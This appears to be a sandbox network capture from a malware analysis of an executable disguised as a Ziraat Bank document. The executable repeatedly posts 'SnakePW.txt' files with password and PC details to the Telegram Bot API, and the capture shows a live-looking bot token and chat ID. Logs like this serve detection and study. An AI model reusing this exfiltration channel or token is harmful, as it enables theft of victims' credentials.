                                      2024-09-26 09:01:43 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 37 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 33 30 33 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35878,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341303,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      105192.168.2.449854149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:01:44 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd08fbf92642ae
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:01:44 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 38 66 62 66 39 32 36 34 32 61 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd08fbf92642aeContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:01:44 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:01:44 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:01:44 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 38 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 33 30 34 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35880,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341304,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      106192.168.2.449855149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:01:45 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd0a4f7852c7fd
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:01:45 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 61 34 66 37 38 35 32 63 37 66 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd0a4f7852c7fdContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:01:45 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:01:45 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 39
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:01:45 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 33 39 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 33 39 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 39","parameters":{"retry_after":39}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      107192.168.2.449856149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:01:46 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd0ad8215b06bb
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:01:46 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 61 64 38 32 31 35 62 30 36 62 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd0ad8215b06bbContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:01:46 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:01:46 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 38
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:01:46 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 33 38 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 33 38 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 38","parameters":{"retry_after":38}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      108192.168.2.449857149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:01:47 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd0b4a4b3f4a98
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:01:47 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 62 34 61 34 62 33 66 34 61 39 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd0b4a4b3f4a98Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:01:47 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:01:47 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 37
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:01:47 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 33 37 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 33 37 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 37","parameters":{"retry_after":37}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      109192.168.2.449858149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:01:48 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd0bb3f9b747b0
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:01:48 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 62 62 33 66 39 62 37 34 37 62 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd0bb3f9b747b0Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:01:48 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:01:48 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 36
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:01:48 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 33 36 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 33 36 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 36","parameters":{"retry_after":36}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      110192.168.2.449859149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:01:49 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd0c074be0e0b4
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:01:49 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 63 30 37 34 62 65 30 65 30 62 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd0c074be0e0b4Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:01:50 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:01:49 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 35
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:01:50 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 33 35 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 33 35 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 35","parameters":{"retry_after":35}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      111192.168.2.449860149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:01:51 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd0cb1bc016dad
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:01:51 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 63 62 31 62 63 30 31 36 64 61 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd0cb1bc016dadContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:01:51 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:01:51 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 33
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:01:51 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 33 33 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 33 33 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 33","parameters":{"retry_after":33}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      112192.168.2.449861149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:01:52 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd0d0d033d72a3
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:01:52 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 64 30 64 30 33 33 64 37 32 61 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd0d0d033d72a3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:01:52 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:01:52 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 32
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:01:52 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 33 32 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 33 32 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 32","parameters":{"retry_after":32}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      113192.168.2.449862149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:01:53 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd0d5d287e471c
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
